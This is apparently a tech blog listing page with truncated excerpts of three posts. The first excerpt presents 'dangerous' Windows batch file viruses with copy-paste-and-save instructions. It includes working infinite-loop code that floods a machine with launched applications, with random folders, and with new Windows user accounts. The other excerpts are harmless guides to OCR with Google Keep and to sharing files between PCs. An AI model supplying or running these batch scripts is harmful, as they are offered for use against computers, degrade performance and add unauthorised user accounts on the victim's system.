Now, here are some small yet extremely dangerous Batch File viruses. You need to just press Ctrl+C (Copy) and Ctrl+V (Paste) code in Notepad. After that save the notepad file as "anyname.bat". Be sure to use '.bat' as extension otherwise it will not work. 1. Application Bomber:- @echo off :x start winword start mspaint start notepad start write start cmd start explorer start control start calc goto x Function- Once executed, it will start to open different applications repeatedly which will affect system's performance. You can also add application of your choice in above code. 2. Folder Flooder- @echo off :x md %random% /folder. goto x Function- Once executed, it will start to generate folders whose name can be any random number. 3. User Account Flooder:- @echo off :xnet user %random% /add goto x Function- Once executed it will start creating Windows User Accounts whose name can be any random number. 4. Process Crea...
There are times when you want to extract text from images. For instance — You found an interesting image with a quote , and you want to copy its text; Extract mobile number and email form a business card; Modify a printed document but without writing it from the scratch; or You simply want to extract text from a write protected PDF file You want to search for text in a printed document. Extracting text from an image is done with an OCR software (short for optical character recognizer). The program takes an image file (like jpg) as input and returns text (that was present in it) as output. Now, most popular OCR readers are either paid (like CamScanner pro) or not very practical to use (like Onenote’s desktop app). But we want something that is free, works on every device, and off course, it should be highly accurate. And guess what, Google Keep is a perfect solution for this. If you not a...
Nowadays, it is common to have more than one computer, like a personal/work computer and home computer that everyone uses in your house. When you have multiple computers, it is common that you find yourselves wanting to share or transfer files between those two computers. Thankfully, sharing files between two computers is way easier than you think and you can do it in multiple ways. 1. Windows HomeGroup If you have two Windows PCs that are Windows 7 and above then the easiest way to share files and folders between those computers is to use the Windows HomeGroup. Creating a HomeGroup in Windows is as easy as clicking a single button. However, one thing to keep in mind is the computers you want to access should be on the same network. To start off, search for “HomeGroup” in the start menu and open it. Once opened, click on the button “Create Homegroup.” The above action will open the HomeGroup creation wizard. Just follow the on-screen instructions. At the end of th...
Comments
Post a Comment